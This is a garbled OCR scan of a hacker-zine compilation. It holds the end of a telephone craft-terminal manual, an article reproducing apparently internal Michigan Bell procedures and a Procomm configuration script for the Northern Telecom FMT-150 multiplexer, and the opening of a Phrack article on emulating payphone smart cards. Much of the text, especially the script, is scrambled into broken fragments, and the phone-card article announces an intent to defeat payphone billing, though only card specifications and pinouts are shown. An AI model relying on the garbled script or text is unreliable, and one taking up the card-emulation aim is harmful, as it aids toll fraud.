erase characters one at a time until it is released. 


nding Your Message to the Computer 


When you are through entering the message, move the pointer to 


the right and press it to send your message. The cursor should 
stop blinking to indicate that your message has been sent. 


—-24- 


Taking Care of Your Terminal 


ne 


To avoid damaging the Craft Access Terminal 


- Don’t drop the terminal. During the work day, the Craft 
Access Terminal should be in the cab of your vehicle or 
clipped to your tool belt when not in use 


—- Don’t unnecessarily expose the terminal to dust, sand, 
water, or salt air. 


Problems Caused by Extreme Temperatures 


Heat 


The Craft Access Terminal can be damaged by extreme Heat. 
DON’ T LEAVE IT ON THE DASH OF YOUR VEHICLE. 


Cold 


Cold is less likely to damage the terminal. However, the 
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screen won’t work properly at temperatures less than -20 
degrees Fahrenheit. If you must use your terminal in colder 
temperatures, you can use it for about 20 minutes in the 
cold, then place it somewhere warm for 15 to 30 minutes and 
then use it in the cold again. 


3. Problems Caused by Water, Condensation, and High Humidity. 


Don’t expose the terminal to water; especially avoid dropping 
the terminal in water. If it does get wet, dry it immediately. 
T 
s 


he Craft Access Terminal will work in rain or snow, but 
hould be wiped dry whenever possible. 


4. How to store the Craft Access Terminal and spare batteries. 


When not in use, the Craft Access Terminal or spare battery 
pack should be connected to the charger. 


5. Under some abnormal conditions, the terminal may lock itself 
into an incorrect state. To "reset" the terminal, simply 
insert the battery charger plug into the charge jack, then 


remove. CAUTION: This will erase any stored information. 


-25- 


For Quick Reference: 


-To quit reading stored information 
-To go back to a screen you saw 


: previously : 
. v 
: BACK 
b ; O 
-To get a Orie SSSaSerses ' :0 n S -to select a choice 
explanation of Hc : 
selectable Ek oO 20 E -to read new page of 
items Ls (JOYSTICK) : help or new page of 
PpOrs :O0 x N- stored information 
-To erase a a : 7 
character or CVOGS waa oa . :0 t D -to send mail 
line e cy O pS , 
: 2: REVIEW : 
(ALPHA-ENTRY) ane ‘ 
(MODE ONLY) : 


-To read information stored in 
the Craft Access Terminal 


-To read previous page of help 
or store information 
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FCC Regulations for Telephone Equipment 
(you know all this crap) 


(BACK COVER) 


eal 


(END) 


Few last notes: 


The real Craft handsets do not have a power switch, they just 
sit on all of the time. So we could also add a power switch to 


ours. 


The Craft handset uses a 1200 baud modem, but seems to be 
incompatible with standard modems... 
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Information about Northern Telecom’s FMT-150B/C/D 
Written by StaTic 
(statik@free.org) 


Ok, 


write the same info that 
check it out. It is in 


that I figured the rest of the worl 


Included info: 


Connecting 


wrote, 


d woul 


ld write some more. 


d be 


I know someone wrote an article in Phrack about the 
FMT-150B/C/D, but I figured I shoul 


FyberLyte 


I am not going to 


in fact I recommend you go and 
Phrack #44-13. This is some stuff I obtained, 
interested in. 


Connecting a FMT-150 to a Rockwell OS-35 
Environmental Alarms to the FMT-150 


Procomm Script to Perform Configuration of FMT-150 
FMT-150 Configuration Checklist 
Glossary of Terms 


INSTRUCTIONS FOR X-CONN 


A pin block will 


ECTING FMT-150 CUSTOMER OUTPUT TO 


ROCKWELL OS-35 INPUTS 


bay equipped with FMT-150 equipment. 


the termination points for the Rockwell 


customer output alarms. 


maximum of 16 FMT-150 systems, 


be provided at the central 
The pin block will 
1 OS-35A and the FMT-150 
will 


in the 
provide 


office location, 


Each pin block 
see pin 


Wiring of the FMT-150 customer outputs 


wil 


Once a FMT-150 system has b 


will 


be done by the vender on the back 


pol 
of the pin block. 


n certified t 


be able to support a 


block diagram. 


nts and the OS-35A points 


he certification team 


be responsible for x-connecting the FMT-150 customer output 
alarm points to the appropriate OS-35A poi 
pin block. Completion of this x-connecting 


nts on the front of the 
will allow FMT-150 


system alarms originating either from the CO or the RT to be 


transported via the OS-35A bac 


Center. 


IMPORTANT, 


MBT CERTIFICATION T 


k to the Lig 


RAMS X-CONN 


ECT ON 


htwave and Radio Alarm 


1Y THE FMT-150 THAT 


AND ONLY AFT 


ERTIFIED. 


OUTPUT 


OIHDOBWNEH 
n 
3 
J 
x 


IS BEING PUT INTO SERVICE 


MAJOR 9 


ALARM #1 
ALARM #2 


ER THE 


ELECTRONICS ARE 


OUTPUT 


Duo PBWNHE CO 


The FMT-150 16 customer outputs are defined as follows: 


DS1 GRP FAIL 
SYSTEM ID CLLI 


COMM. EQUIP. ALARM 
NODE #1 CO 
NODE #2 REMOTE 


The Rockwell OS-35A provides a total of 32 separate alarm points. 
[The first 16 points with the exception of point 13 have been 


multiplied on the pin block to provide x-connect points for a total 
of 16 FMT-150 systems, 


On the pin block x-connect the designated 


see pin block diagram. 


(1 of 16) FMT-150 system 
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customer outputs, pins 1-12 and 14-16 to the appropriate OS-35A 
pins 1-12 and 14-16, see pin block diagram. 


Pins 17-32 on the pin block going to the OS-35A will be used for 
x-connecting the customer output #13 from each FMT-150 system. 
Customer output #13 provides the system ID for the FMT-150, see pin 
block diagram. 


X-CONNECT CUSTOMER OUTPUT #13 FROM FMT-150 SYSTEMS IN 
THIS SEQUENCE 


OS-35A FMT-150 System 
PIN 17 SYSTEM 1 
PIN 18 SYSTEM 2 
PIN 31 SYSTEM 15 
PIN 32 SYSTEM 16 
AGAIN, WIRE ONLY THE FMT-150 SYSTEM THAT IS BEING PUT INTO SERVICE 


AND ONLY AFTER CERTIFICATION OF ELECTRONICS HAVE BI 


Ltd 


EN COMPLETED. 


After x-connects have been completed on FMT-150 system that has 
been certified, contact the Alarm Center at (313) 223-9688 and 
verify that all 16 customer output alarm conditions at both the CO 
and RT can be activated and are reporting via the OS-35A back to 
the alarm center. 


The Lightwave Alarm Center will monitor the FMT-150 system for a 24 
hour quiet period for alarms. During this 24 hour period if no 
alarms are detected by the Lightwave Alarm Center, the FMT-150 will 
be considered certified for alarming and ready for continual 
monitoring. 


If during the 24 hour quiet period the alarm center receives alarms 
from the FMT-150 system, it will not be certified for continual 
monitoring and it will be the responsibility of the MBT 
Certification Teams to resolve those alarms. 


INSTRUCTIONS FOR CROSS CONNECTING ENVIRONMENTAL ALARMS TO 
THE FMT-150 INPUTS. 


Environmental alarms at remote locations may be connected to the 
FMT-150 customer inputs. If more than one system exists, these 
alarms should only be connected to the first. Since many remotes 
will not be equipped with all of these alarms, a checklist has been 
provided on the system acceptance sheets to indicate which have 
been wired. The alarms provided for are Smoke Detector, Sump Pump, 
Open Door, AC Power Fail, HI-LO Temperature, Rectifier Fail, and 
Battery Float. These are wired to pins D8 through E9 on the 
FMT-150 backplane. See Shelf Backplane Detail, attached. 


All Customer Inputs are software connected to Customer Output #12. 
They will also bring in Bay Minor (Output #1) or Bay Major (Output 
#2) as appropriate. Inputs #1 (Smoke Detector) and #2 (Sump Pump) 
are latching inputs that can only be cleared by accessing the MCU 
with a VT100 terminal. See Section 321-3211-01, DP 3003, page 2. 


FMT-150 systems using external inputs for environmental alarms and 
which use E2 telemetry rather than the OS-35 MUST be provided with 
type NT7H90XH Maintenance Control Units at both ends. 


External alarm operation and telemetry if equipped, should be 
verified with the Alarm Center during acceptance. 
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Procomm Script for Accessing FMT-150B/C/D 


KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK KKK K 


7* * 
1’ 

es FMT150.CMD Version 5.00 Dec 18, 1990 ES 
He Please Destroy all previous versions of this program! * 
o* * 
1, 

iy NOTE: Procomm is a product of Datastorm Technologies s 
A, ROR AIRE RIK NORRIE R IRR ROR ARIE RIK IRR RRR RR RR KR IK BRR RIS LINK RRR TEI RK TRUER RIA IR RRR AE 
’ 

; The script FMT150.CMD was written to automatically perform 

' all configuration commands for the Northern Telecom FMT-150 

7 fiber optic multiplexer. Specifically, this script will 

; complete over 125 configuration commands (performance 

: threshold, error correction, and alarm outputs) as outlined 

7 in Section 4 of the Michigan Bell Certification Procedure for 

; the FMT-150. This program is compatible with all 

+ certification requirements for FMT-150 MCU NT7H90XA or MCU 

; NT7H9OXE. 

7 

: Requirements: 

7 1) Toshiba T1000 craft terminal or DOS equivalent. 

7 2) Proper serial cables and adapters. 

- 3) Procomm disk with FMT150.CMD file. 

a 

Procedure for use: 

; 1) Remove disk from drive, then turn on computer. When the DOS 

7 prompt appears insert the PROCOMM disk into disk drive. 

; Enter the command "A:" + <ENTER>. 

: 2) Enter the command "FIXPRN" + <ENTER>. 

: 3) Enter the command "PROCOMM" + <ENTER>. 

; 4) While holding the <ALT> key down, press the <D> key, 

; and select FMT-150 from the dialing menu. 

F 5) Gain access to MCU as normal (press the <ENTER> key 3 times). 
; 6) Once logged in, reset the MCU to factory default by 

. entering "M"(aintenance) "R"(eset) "*"(all) + <ENTER>. 

HB It will take approximately three minutes to reconfigure. 

; 7) Gain access to MCU again as in steps 3) & 4). 

7 8) Select the script by pressing <ALT><F5> keys simultaneously. 

- 9) When prompted for command file enter "FMT150" + <ENTER>. 

; 10) Answer questions and away you go! 


; HISTORY: Version 4.00 May 15, 1990 by AQW final release version 

; HISTORY: Version 4.10 Aug 08, 1990 by JBH mod to use VPRINT to divert 
: printer into a better bit bucket, and to correct callback #. 
; HISTORY: Version 4.12 Nov 21, 1990 by EEE to use Customer Inputs 

; HISTORY: Version 5.00 Dec 18, 1990 by JBH to update documentation 
N051690000 


Dn 


D> 
¢ 
n 
Sw 
AAA eee 


" KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKAKW 


*wW 


FMT-150 MCU NT7H90XC\CA CONFIGURATION PROGRAM *" 
MCU NT7H90XE\EA CONFIGURATION PROGRAM *" 


*wW 


EC 18, 1990 ay 
*W 
MICHIGAN BELL TELEPHONE COMPANY a 

A DIVISION OF AMERITECH x 


*W 


VERSION 5.00 


O 


Se ees eee es sb Gs 
DC C1] CF DC C1] CF DC C1] C et aE 

n 

n 

> 

Q 


+ + + + + FF F F F 


7] 

n 

n 

> 

Q 
THe 


7 VARIABLE DOCUMENTATION 
;SQ=CLLI A USER INPUT 
;S1=CLLI B USE 


1, 


’ 


DUE EE EE © 


.txt 


ESSAGI 
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* 


[7] 


AUSE 
LARM 


3 
1 


S2=CL 


R INPUT 


I LOCAL USER INPUT 


I 
S3=YEAR 2 DIGIT USER INPUT 
;S4=MONTH 2 DIGIT USE 


R INPUT 


*W 


ESSAGE " KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKAKKKAKW 
ESSAGE " " 
ESSAGE " " 
ESSAGE " ....TO EXIT THIS PROGRAM AT ANY TIME, PRESS <ESC>...." 


;S5=DAY 2 DIGIT USER INPUT 
;S6=HOUR 2 DIGIT USER INPUT 
;S7=MINUTE 2 DIGIT USER INPUT 
;S8=SYSTEM ID & USER 
;S9=SYSTEM NUMBER 

LABEL1: 

7; note 


RESPONSE USED TO CONTROL PROGRAM FLOW 


the following statement was superseded in version 4.10 by VPRINT 


MODE LPT1:=COM2:" ; REQUIRED TO TURN PRINTER ERROR OFF 


E "Enter CLLI code for LOCATION A (C.O.) using full 8 or 11 characters:" 


E "Enter CLLI code for LOCATION B (REMOTE) using full 8 or 11 characters:" 


"Enter CLLI code for YOUR location using full 8 or 11 characters:" 


‘MI’, for example ALBNMN-JCSNMN." 


E "Enter system number, for example 1201 / T3x." 


ENT 


ER> W 


“DOS?” 

; following flushes the "RUB" buffer 
TRANSMET.."“*HOHSHSHSHAHA AS ASSAYS AAS aA Asana 
CLEAR 

LOCATE 10,2 

MESSAG 

LOCATE 12,2 

GET SO 11 ;CLLI A 

M ES SAGE W W 

CLEAR 

LOCATE 10,2 

MESSAG 

OCATE 12,2 

GET S1 11 ;CLLI B 

MESSAGE W W 

CLEAR 

OCATE 10,2 

MESSAGE ' 

OCATE 12,2 

GET S2 11 

CLEAR 

,OCATE 8,2 
MESSAGE "Enter system ID without 
LOCATE 10,2 

GET S8 13 

,OCATE 13,2 
MESSAG 

,OCATE 15,2 

GET S9 15 

TRANSMIT "CGNS" 

TT RANSMIT WNW 

TRANSMIT S8 

TRANSMIT "*‘"" 

TRANSMIT "!" 
CLEAR 

LOCATE 6,2 
MESSAGE "Enter today’s date." 
OCATE 8,2 
MESSAGE "Enter two digit year + < 
LOCATE 8,34 
GET S3 2 ; 2 DIGIT YEAR 
LOCATE 10,2 
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MESSAGE "Enter two digit month + <ENTER>. Use 0’s if required." 
,OCATE 10,58 

GET S4 2 ; 2 DIGIT MONTH 
OCATE 12,2 

MESSAGE "Enter two digit day + <ENTER>. Use 0’s if required." 
LOCATE 12,56 

GET S5 2 ; 2 DIGIT DAY 
CLEAR 

LOCATE 6,2 

MESSAGE "Enter time." 
LOCATE 8,2 
MESSAGE "Enter two digit hour + <ENTER>. Use 0’s if required." 
,OCATE 8,57 

GET S6 2 ; 2 DIGIT HOUR 
,OCATE 10,2 

MESSAGE "Enter two digit minute + <ENTER>. Use 0’s if required. 
,OCATE 10,59 

GET S7 2 ; 2 DIGIT MINUTE 
CLEAR 


;SET TIME DP3025 
SMIT "CT" 
SMIT S6 
SMIT "" 
SMIT S7 

TRANSMIT " !" 
S 
S 
R 


7PROMPT THE USER TO CHECK INPUTS FOR LOCATIONS 
LOCATE 1,2 
MESSAGE "Please verify the following information." 
LOCATE 4,2 

MESSAGE "LOCATION A CLLI COD 
,OCATE 4,26 

MESSAGE SO 

LOCATE 6,2 

MESSAGE "LOCATION B CLLI COD 
LOCATE 6,26 

MESSAGE S1 

LOCATE 8,2 

MESSAGE "LOCAL LOCATION CLLI CODE =" 

LOCATE 8,29 

MESSAGE S2 

LOCATE 10,2 

MESSAGE "SYSTEM ID = " 

LOCATE 10,17 

MESSAGE S8 

OCATE 12,2 

MESSAGE "SYSTEM NUMBER = " 

OCATE 12,21 

MESSAGE S9 

LOCATE 17,2 

MESSAGE "IS INFORMATION CORRECT? Y/N + <ENTER>" 
LOCATE 17,44 

GET S8 1 
SWITCH S8 

CASE "Y" 

7DO NOTHING 
iINDCASE 
EFAULT 
GOTO LABEL1 ; JUMP TO TOP AND EN 
ENDCASE 
ENDSWITCH 
CLEAR 
OCATE 8,15 


— W 


eal 
| 


ea] 
| 


5 


O 


H 


ER INFORMATION AGAIN 
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MESS 


AG 


ALAR 
PAUS 


“OK. ¢ *HE 


RE WE 


GOs 


MIT 


S) 
iS) 
S) 
SMIT 
iS) 
iS) 
iS) 


E NODE 


rep! 
$3 


W W 


S4 


W W 


S5 


wou. 


1 USI 


s 
SMIT 
SMIT 
SMIT 
SMIT 


ea) 


NODE 


"CGNN1 


WNW 
So 
WNW 


wow 


2 USI 


MIT 
MIT 
MIT 
MIT 
MIT 


NNNnNANnNN 


"CGNN2 


WNW 
SL 
WNW 


wow 


INE 


SITE 


E DP3024 


NG CENTRAL OFFICE 


[J 


CLLI COD 


W 


NG REMOTE 


CLLI COD 


[7] 


W 


TRANSMIT 
; TRANSMIT 
; TRANSMIT 
; TRANSMIT 
; TRANSMIT 
; TRANSMIT 
; TRANSMIT 


MEGS2. dex2. ae 


WNW 


SO 


WNW 


Sl 


E CUSTOMER OUTPUT POINTS 


TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 


MIT 
MIT 
MIT 
MIT 
MIT 
MIT 
MIT 
MIT 
MIT 
MIT 
MIT 
MIT 
MIT 


"CGNO1 
WNW BAY 
Ww ! Ww 
"CGNO2 
WNW BAY 
Ww ! Ww 
"CGNO3 
WNW OP aD 


wow 


W 


MINOR vow 


W 


MAJOR vw 


Vn 
Li 


Vn 
Li 


MIT 
MIT 


2 
Zz 


MIT 
MIT 
MIT 
MIT 
MIT 
MIT 
MIT 
MIT 
MIT 
MIT 
MIT 


Bee eee ee ee ee eee eee eee ees 
A 


Tx, MN 


W 


RX Vn 


ALARM #1‘*"" 


ALARM #2*‘"" 


iS 


DP3013 


6 


"DO NOT PRESS ANY KEYS UNTIL CONFIGURATION COMPLET 
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TRANSMIT "*‘"HSA ALARM*‘"™" 
TRANSMIT "!" 
TRANSMIT "CGNO11 " 
TRANSMIT "*‘"HSB ALARM*‘"™" 
TRANSMIT "!" 

; TRANSMIT "CGNO12 " 

; TRANSMIT "*‘"DS1 GRP FATIL‘"™" 
; TRANSMIT "!" 

TRANSMIT "CGNO13 " 


by bs RANSMIT WNW 

TRANSMIT S9 

rT RANSMIT WNW 

TRANSMIT "!" 

TRANSMIT "CGNO14 " 

TRANSMIT "*"COM EQUIP ALRM*‘"" 
TRANSMIT "!" 

TRANSMIT "CGNO15 " 

TRANSMIT "‘"NODE #1 CO*%"" 
TRANSMIT "!" 

TRANSMIT "CGNO16 " 

TRANSMIT "‘"NODE #2 REMOTE*"" 
TRANSMIT "!" 

;DELETE ALL EXISTING CUSTOMER OUTPUTS 
TRANSMIT "CGO1l D*!" 

TRANSMIT "CGO2 D*!" 

TRANSMIT "CGO3 D*!" 

TRANSMIT "CGO4 D*!" 

TRANSMIT "CGO5 D*!" 

TRANSMIT "CGO6 D*!" 

TRANSMIT "CGO7 D*!" 

TRANSMIT "CGO8 D*!" 

TRANSMIT "CGO9 D*!" 

TRANSMIT "CGO10 D*!" 

TRANSMIT "CGO11 D*!" 

TRANSMIT "CGO12 D*!" 

TRANSMIT "CGO13 D*!" 

TRANSMIT "CGO14 D*!" 

TRANSMIT "CGO15 D*!" 

TRANSMIT "CGO16 D*!" 
;CUSTOMER OUTPUTS 1-2 
TRANSMIT "CGO1l AS1 G100 !" 
TRANSMIT "CGO2 AS1 G120 !" 
;CUSTOMER OUTPUTS 3-9 
TRANSMIT "CGO3 AS1 G107 !" 
TRANSMIT "CGO4 AS1 G108 !" 
TRANSMIT "CGO5 AS1 G101 !" 
TRANSMIT "CGO5 AS1 G102 !" 
TRANSMIT "CGO5 AS1 G103 !" 
TRANSMIT "CGO6 AS1 G104 !" 
TRANSMIT "CGO6 AS1 G105 !" 
TRANSMIT "CGO6 AS1 G106 !" 
TRANSMIT "CGO7 AS1 G109 !" 
TRANSMIT "CGO8 AS1 G110 !" 
TRANSMIT "CGO9 AS1 G111 !" 
;CUSTOMER OUTPUTS 10-11 
TRANSMIT "CGO10 AS1 M1 MH18 !" 
TRANSMIT "CGO10 AS1 M2 MH18 !" 
TRANSMIT "CGO10 AS1 M3 MH18 !" 
TRANSMIT "CGO11 AS1 M1 MH19 !" 
TRANSMIT "CGO11 AS1 M2 MH19 


TRANSMIT "CGO11 AS1 M3 MH19 
; TRANSMIT "CGO12 AS1 M1 1H2 
; TRANSMIT "CGO12 AS1 M2 1H2 
; TRANSMIT "CGO12 AS1 M3 1H2 
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; TRANSMIT "CGO12 AS1 M1 1H3 !" 
; TRANSMIT "CGO12 AS1 M2 1H3 !" 
; TRANSMIT "CGO12 AS1 M3 1H3 !" 


;CUSTOMER OUTPUT 13, 14 


TRANSMIT "CGO13 AS1 G100 !" 
TRANSMIT "CGO13 AS1 G120 !" 
TRANSMIT "CGO14 AS1 G112 !" 
;CUSTOMER OUTPUTS 15, 16 
TRANSMIT "CGO15 AN1 G100 !" 
TRANSMIT "CGO15 AN1 G120 !" 
TRANSMIT "CGO16 AN2 G100 !" 
TRANSMIT "CGO16 AN2 G120 !" 
7SET TO AUTOMATIC CONTROL 
TRANSMIT "CGOl1 CA!" 
TRANSMIT "CGO2 CA!" 
TRANSMIT "CGO3 CA!" 
TRANSMIT "CGO4 CA!" 
TRANSMIT "CGO5 CA!" 
TRANSMIT "CGO6 CA!" 
TRANSMIT "CGO7 CA!" 
TRANSMIT "CGO8 CA!" 
TRANSMIT "CGO9 CA!" 
TRANSMIT "CGO10 CA!" 
TRANSMIT "CGO11 CA!" 
TRANSMIT "CGO12 CA!" 
TRANSMIT "CGO13 CA!" 
TRANSMIT "CGO14 CA!" 
TRANSMIT "CGO15 CA!" 
TRANSMIT "CGO16 CA!" 

’ 

;DEFINE CUSTOMER OUTPUT 12 
TRANSMIT "CGO12 D*!" 
TRANSMIT "CGNO12 " 

TRANSMIT "‘"EXT ALM*"™" 
TRANSMIT "!" 

TRANSMIT "CGO12 AN2 G118 !" 
;also attach to pt 13 for alarm center 
TRANSMIT "CGO13 AN2 G118 !" 
f 

;DEFINE CUSTOMER INPUTS 
TRANSMIT "CGNI1 " 

TRANSMIT "*‘"SMOKE DET. *"" 
TRANSMIT "!" 

TRANSMIT "CGNI2 " 

TRANSMIT "*"SUMP PUMP *"" 
TRANSMIT "!" 

TRANSMIT "CGNI3 " 

TRANSMIT "*"OPEN DOOR*"™" 
TRANSMIT "!" 

TRANSMIT "CGNI4 " 

TRANSMIT "*‘"AC PWR FAIL‘*‘"" 
TRANSMIT "!" 

TRANSMIT "CGNI5 " 

TRANSMIT "*‘"HI-LO TEMP *"" 
TRANSMIT "!" 

TRANSMIT "CGNI6 " 

TRANSMIT "‘"RECT. FAIL‘*"" 
TRANSMIT "!" 

TRANSMIT "CGNI7 " 

TRANSMIT "‘"BATT FLOAT *"" 
TRANSMIT "!" 


;ADD CONDITIONS TO CUSTOMER OUTPUT 1 
TRANSMIT "CGO1l AN2 SS5 !" 
TRANSMIT "CGO1l AN2 SS6 !" 
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TRANSMIT "CGO1l AN2 SS7 !" 


’ 
;ADD CONDITIONS TO CUSTOMER OUTPUT 2 
TRANSMIT "CGO2 AN2 SS1 !" 

TRANSMIT "CGO2 AN2 SS2 ! 
TRANSMIT "CGO2 AN2 SS3 !" 
TRANSMIT "CGO2 AN2 SS4 ! 


ie 


;7PER JOE OLSZTYN SWITCHING SYSTEMS STAFE 
; LEAVE PERFORMANCE MONITORING AT FACTORY DEFAULT 
;DISABLE BLUE INSERTION FOR POINT TO POINT SYSTEMS 


7IN A MULTIPOINT SYSTEM BLUE INSERTION SHOULD BE ENABLE 


; ENABLE ALARM LOGGER 
TRANSMIT "CAD!" 


;DISABLE BLUE INSERTION NODE 1 DP3019 
TRANSMIT "CN 1 BE!" 
TRANSMIT "CN 2 BE!" 
TRANSMIT "CN 3 BE!" 

ENABLE PARITY CORRECTION NODE 1 DP3020 
TRANSMIT "CN1 Tl PE!" 
TRANSMIT "CN1 T2 PE!" 
TRANSMIT "CN1 T3 PE!" 

ENABLE RX OVERHEAD NODE 1 DP3021 
TRANSMIT "CN1 Tl RE!" 
TRANSMIT "CN1 T2 RE!" 
TRANSMIT "CN1 T3 RE!" 

ENABLE TX OVERHEAD NODE 1 DP3022 
TRANSMIT "CN1 Tl TE!" 
TRANSMIT "CN1 T2 TE!" 
TRANSMIT "CN1 T3 TE!" 


NAL DEGRADE 10E-8 NODE 1 DP3158 
TRANSMIT "CN1 T1 S8!" 
iS) 
S) 


MIT "CN1 T2 S8!" 
MIT "CN1 T3 S8!" 


;DISABLE BLUE INSERTION NODE 2 DP3019 
TRANSMIT "CN2 Tl BE!" 
TRANSMIT "CN2 T2 BE!" 
TRANSMIT "CN2 T3 BE!" 
ENABLE PARITY CORRECTION NODE 2 DP3020 
TRANSMIT "CN2 Tl PE!" 
TRANSMIT "CN2 T2 PE!" 
TRANSMIT "CN2 T3 PE!" 
ENABLE RX OVERHEAD NODE 2 DP3021 
TRANSMIT "CN2 Tl RE!" 
TRANSMIT "CN2 T2 RE!" 
TRANSMIT "CN2 T3 RE!" 
ENABLE TX OVERHEAD NODE 2 DP3022 
TRANSMIT "CN2 Tl TE!" 
TRANSMIT "CN2 T2 TE!" 
TRANSMIT "CN2 T3 TE!" 
; SIGNAL DEGRADE 10E-8 NODE 2 DP3158 
TRANSMIT "CN2 Tl S8!" 
TRANSMIT "CN2 T2 S8!" 
TRANSMIT "CN2 T3 S8!" 


; LINE LEARN ALL MULTIPLEXERS BOTH NODES 
TRANSMIT "CN1 M1 L!" 
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TRANSMIT "CN1 M2 L! 
TRANSMIT "CN1 M3 L! 
TRANSMIT "CN2 M1 L!" 
TRANSMIT "CN2 M2 L! 
TRANSMIT "CN2 M3 L! 


; CONFIGURATION IS COMPLETE EXIT THE PROGRAM 
BAR 


MESSAGE "...... CONFIGURATION COMPLETE...... * 


MESSAGE "CONTINUE WITH SECTION 5 OF CERTIFICATION" 


ALARM 2 

PAUSE 5 

EXIT 

Glossary of Terms 

4w Four Wire 

ACO Alarm Cut-Off 

ACTV Active (module -- carrying traffic) 

AGC Automatic Gain Control 

AIS Alarm Indication Signal -- indicates an alarm upstream 

AMI Alternate Mark Inversion -- a technique by which the polarity of 
alternate pulses is inverted 

APD Avalanche Photo Diode -- used for detecting pulses of light 
at the receive end of an optical fiber 

AUD Audible alarm 

BDF Battery Distribution Frame 

BER Bit Error Rate 

BIP Bit Interleave Parity 

BPV Bipolar Violation -- signal is not alternating as expected 

CAMMS Centralized Access Maintenance and Monitoring System -- 
a bay-mounted shelf with push buttons and an luminescent display, 
which is used to control FMT-150 networks, as well as other 
Northern Telecom transmission equipment 

CDP Centralized Display Panel 

CEV Controlled Environment Vault 

CO Central Office 

CPC Common Product Code -- a Northern Telecom code used to identify 
equipment 

DDD Direct Distance Dialing 


DM-13 Digital Multiplexer which multiplexes between DS-1/1C/2 signals 
and DS-3 signals 


DNA Dynamic Network Architecture 

E2A A serial interface for alarm polling of equipment 
FE Frame Error 

FER Frame Error Rate 

FL Frame Loss 

FLC Frame Loss Counter 

FLS Frame Loss Seconds 

FE 


U 
1s) 


Future Product to be Developed 


Group A multiplexed signal made up of four DS-l1s, two DS-1Cs, or 
one Ds-2 

Hub An FMT-150 site which branches one 150 Mb/s signal into two or 
three signals, in different directions, without sacrificing 
OA & M continuity 

LBR Loopback Request 

MCU Maintenance Control Unit 

MM Multimode Optical Fiber 

MSB Most Significant Bit 

Muldem Multiplexer/demultiplexer 

NRZ Non-Return to Zero 

OTT Optical Termination Tray 

PEC Product Engineering Code -- a Norther Telecom code used to identify 
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equipment. The preferred code to be used when ordering Northern 
Telecom equipment. 


PER Parity Error Rate 

PES Parity Error Seconds 

RTO Ready To Order 

SCU Service Channel Unit 

SMB Sub-Miniature BNC type connector 

SR Stuff Request 

STX (Pseudo) Synchronous Transport Signal: First Level at 
49.92 Mb/s (Northern Telecom) 

TBOS Telemetry Byte Oriented System 

VIS Visual Alarm 

WDM Wavelength Division Multiplexing 


XOW Express Orderwire 
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==Phrack Magazine== 


Volume Seven, Issue Forty-Eight, File 10 of 18 


Electronic Telephone Cards: How to make your own! 


I guess that Sweden is not the only country that employs the electronic 
phone card systems from Schlumberger Technologies. This article will 
explain a bit about the cards they use, and how they work. In the end of 
this article you will also find an UUEncoded file which contains source 
code for a PIC16C84 micro-controller program that completely emulates a 
Schlumberger Telephone card and of course printed circuit board layouts 
+ a component list... But before we begin talking seriously of this 
matter I must first make it completely clear that whatever you use this 
information for, is entirely YOUR responsibility, and I cannot be held 
liable for any problems that the use of this information can cause for 
you or for anybody else. In other words: I give this away FOR FREE, and 
I don’t expect to get ANYTHING back in return! 


The Original Telephone Card: 

Since I probably would have had a hard time writing a better article 
than the one Stephane Bausson from France wrote a while ago, I will not 
attempt to give a better explanation than that one; I will instead 
incorporate it in this phile, but I do want to make it clear that the 
following part about the cards technical specification was not written 
by me: Merely the parts in quotes are things added by me... Instead I 
will concentrate on explaining how to build your own telephone card 
emulator and how the security measures in the payphone system created by 
Schlumberger Technologies work, and how to trick it... But first, let’s 
have a look at the technical specifications of the various "smart memory 
card" systems used for the payphones. 


<Start of text quoted from Stephane Bausson (sbausson@ensem.u-nancy.fr) > 


What you need to know about electronics telecards 


(C) 10-07-1993 / 03-1994 
Version 1.06 
Stephane BAUSSON 


Email: sbausson@ensem.u-nancy.fr 
Smail: 4, Rue de Grand; F-88630 CHERMISEY; France 
Phone: (33)-29-06-09-89 


Any suggestions or comments about phonecards and smart-cards are welcome 


Content 


I) The cards from Gemplus, Solaic, Schlumberger, Oberthur: 


) Introduction: 

) SCHEMATICS of the chip: 
) PINOUT of the connector: 
) Main features: 
) 

) 

) 


TIME DIAGRAMS: 
Memory MAP of cards from France and Monaco: 
Memory MAP of cards from other countries: 


II ) The cards from ODS: (German cards) 
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II-1) Introduction: 

II-2) Pinout: 

II-3) Main features: 

II-4) Time Diagrams: 

ITI-5) Memory Map: 

II-6) Electrical features: 


III) The Reader Schematic: 


IV) The program: 


I.) The cards from Gemplus, Solaic, Schlumberger, Oberthur: (French cards) 


I-1) Introduction: 


You must not think that the electronics phone-cards are 
completely secret things, and that you can not read the information that 
is inside. It is quite false, since in fact an electronic phonecard does 
not contain any secret information like credit cards, and an electronic 
phonecard is nothing else than a 256 bit EPROM with serial output. 


Besides do not think that you are going to refill them when you 
understand how they work, since for that you should reset the 256 bits 
of the cards by erasing the whole card. But the chip is coated in UV 
opaqued resin even if sometimes you can see it as transparent! Even if 
you were smart enough to erase the 256 bits of the card you should 
program the manufacturer area, but this is quite impossible since thes 
first 96 bits are write protected by a lock-out fuse that is fused after 
the card programming in factory. 


Nevertheless it can be very interesting to study how these cards 
work, to see which kind of data are inside and how the data are mapped 
inside or to see how many units are left inside for example. Besides 
there are a great number of applications of these cards when there are 
used (only for personal usage of course) , since you can use them as key 
to open a door, or you can also use them as key to secure a program, 

CLC sis 


These Telecards have been created in 1984 and at this time 
constructors decided to build these cards in NMOS technology but now, 
they plan to change by 1994 all readers in the public to booths and use 
CMOS technology. Also they plan to use E 


‘EPROM to secure the cards and to 
add many useful informations in, and you will perhaps use phone cards to 
buy you bread or any thing else. 


These cards are called Second Generation Telecards. 


I-2) SCHEMATICS of the chip: 


--|> Clk 
--| R/W 
-—-| Reset 


-—-| Fuse 


——| Vpp 


5 
joreesse, 
6 
7 
Vee 
8 


only the position of the chip is 


standardized and not the pinout 
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| | 
| | 
ro, el 
| | 
| Out |-- serial output 
, , 
I-3) PINOUT of the connector: 
AFNOR CHIP ISO 
8 4 1 
$------- \ /-------4 ; $------- \ 
7 3 2 
6 2 3 
4$------- / \-------4 4$------- / 
5 1 4 
